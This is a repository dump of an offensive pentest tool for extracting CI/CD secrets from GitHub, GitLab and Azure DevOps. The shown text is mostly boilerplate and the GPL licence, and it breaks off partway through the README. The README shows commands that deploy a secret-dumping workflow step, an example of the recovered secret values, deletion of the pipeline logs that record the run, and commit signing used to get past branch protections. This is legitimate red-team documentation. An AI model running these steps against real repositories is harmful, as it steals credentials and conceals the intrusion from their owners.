Showing preview only (295K chars total). Download the full file or copy to clipboard to get everything.
Repository: synacktiv/nord-stream
Branch: main
Commit: 7c96209da201
Files: 32
Total size: 282.7 KB
Directory structure:
gitextract_yz6qr87i/
├── .github/
│ └── ISSUE_TEMPLATE/
│ ├── bug_report.md
│ └── feature_request.md
├── .gitignore
├── .pre-commit-config.yaml
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── nordstream/
│ ├── __main__.py
│ ├── cicd/
│ │ ├── devops.py
│ │ ├── github.py
│ │ └── gitlab.py
│ ├── commands/
│ │ ├── devops.py
│ │ ├── github.py
│ │ └── gitlab.py
│ ├── core/
│ │ ├── devops/
│ │ │ └── devops.py
│ │ ├── github/
│ │ │ ├── display.py
│ │ │ ├── github.py
│ │ │ └── protections.py
│ │ └── gitlab/
│ │ └── gitlab.py
│ ├── git.py
│ ├── utils/
│ │ ├── constants.py
│ │ ├── devops.py
│ │ ├── errors.py
│ │ ├── helpers.py
│ │ └── log.py
│ └── yaml/
│ ├── custom.py
│ ├── devops.py
│ ├── generator.py
│ ├── github.py
│ └── gitlab.py
├── pyproject.toml
└── requirements.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: "[BUG]"
labels: bug
assignees: hugo-syn
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Add information that could help us to reproduce the bug like:
- privileges of the Token
- scope of the Token
- protections on a branch or environment
- Output of the tool with the `--debug` options (Don't forget to strip your secrets)
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Additional context**
Add any other context about the problem here.
================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: Feature request
about: Suggest an idea for this project
title: "[FEAT]"
labels: enhancement
assignees: hugo-syn
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Additional context**
Add any other context or screenshots about the feature request here. This can include specific configuration of the SCM or CI/CD system to help us implement the feature.
================================================
FILE: .gitignore
================================================
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
build/
#custom
nord-stream-logs/
notes.md
.vscode
================================================
FILE: .pre-commit-config.yaml
================================================
repos:
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v6.0.0
hooks:
- id: check-added-large-files
- id: check-case-conflict
- id: check-executables-have-shebangs
- id: check-merge-conflict
- id: check-shebang-scripts-are-executable
- id: end-of-file-fixer
- id: fix-byte-order-marker
- id: mixed-line-ending
args:
- --fix=no
- id: trailing-whitespace
args:
- --markdown-linebreak-ext=md
- repo: https://github.com/psf/black
rev: 26.1.0
hooks:
- id: black
language_version: python3
args:
- --line-length=120
- repo: https://github.com/compilerla/conventional-pre-commit
rev: v4.4.0
hooks:
- id: conventional-pre-commit
stages: [commit-msg]
args: [build, chore, ci, docs, feat, fix, perf, refactor, revert, style, test]
================================================
FILE: CONTRIBUTING.md
================================================
# Contributing rules
- Install [`pre-commit`](https://pre-commit.com/).
- Enable `pre-commit` hooks in the repository folder: `pre-commit install && pre-commit install --hook-type commit-msg`. These hooks automatically format the code and check the format of the commit message.
- The format of commit messages must follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) convention.
================================================
FILE: LICENSE
================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
================================================
FILE: README.md
================================================
# Nord Stream
Nord Stream is a tool that allows you extract secrets stored inside CI/CD environments by deploying _malicious_ pipelines.
It currently supports Azure DevOps, GitHub and GitLab.
Find out more in the following blogpost: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
## Table of Contents
- [Nord Stream](#nord-stream)
- [Table of Contents](#table-of-contents)
- [Installation](#installation)
- [Usage](#usage)
- [Shared arguments](#shared-arguments)
- [Describe token](#describe-token)
- [Build YAML](#build-yaml)
- [YAML](#yaml)
- [Clean logs](#clean-logs)
- [Signing commits](#signing-commits)
- [Azure DevOps](#azure-devops)
- [Service connections](#service-connections)
- [SSH](#ssh)
- [Listing orgs](#listing-orgs)
- [Help](#help)
- [GitHub](#github)
- [List protections](#list-protections)
- [Disable protections](#disable-protections)
- [Force](#force)
- [Azure OIDC](#azure-oidc)
- [AWS OIDC](#aws-oidc)
- [Help](#help-1)
- [GitLab](#gitlab)
- [List secrets](#list-secrets)
- [YAML](#yaml-1)
- [List protections](#list-protections-1)
- [Help](#help-2)
- [TODO](#todo)
- [Contact](#contact)
## Installation
```
$ pipx install git+https://github.com/synacktiv/nord-stream
```
`git` is also required (see https://git-scm.com/download/) and must exist in your `PATH`.
## Usage
Here is a simple example on GitHub; initially, one can enumerate the various secrets.
```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
```
Then proceed to the exfiltration:
```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[*] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[*] Getting secrets from environment: "PROD" (org/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=Value only accessible from prod environment
[*] Cleaning logs.
[*] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
```
### Shared arguments
Some arguments are shared between [GitHub](#github), [Azure DevOps](#azure-devops) and [GitLab](#gitlab) here are some examples.
#### Describe token
The `--describe-token` option can be used to display general information about your token:
```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
```
#### Build YAML
The `--build-yaml` option can be used to create a pipeline file without deploying it. It retrieves the various secret names to build the associated pipeline, which can be used to add custom steps:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
name: command
env:
secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
environment: PROD
```
#### YAML
The `--yaml` option can be used to deploy a custom pipeline:
```yml
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: echo "Hello from step 1"
name: step 1
- run: echo "Doing some important stuff here"
name: command
- run: echo "Hello from last step "
name: last step
```
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml
[+] "synacktiv/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch
[*] Running custom workflow: .../custom.yml
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Workflow output:
2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here"
2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here"
2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0137261Z ##[endgroup]
2023-07-18T20:08:33.0422019Z Doing some important stuff here
[*] Cleaning logs.
[*] Check output: .../nord-stream-logs/github
```
By default, it will display the output of the task named `command` of the `init` job, but everything is stored locally and can be access manually:
```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
```
#### Clean logs
By default, Nord Stream will attempt to remove traces left after a pipeline deployment, depending on your privileges. To preserve traces, the `--no-clean` option can be used. This will keep the pipeline logs, but this will still revert the changes made to the repository.
Note that for GitLab, some traces cannot be deleted.
#### Signing commits
Repository administrators can enforce required commit signing on a branch to block all commits that are not signed and verified. With Nord Stream it's possible to sign commit to bypass such protection.
First create an import your GPG key on the SCM platform.
```sh
$ gpg --full-generate-key
$ gpg --armor --export F94496913C43EFC5
$ gpg --list-secret-keys --keyid-format=long
sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23]
Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
uid [ultimate] test-gpg <test.gpg@cicd.local>
```
```bash
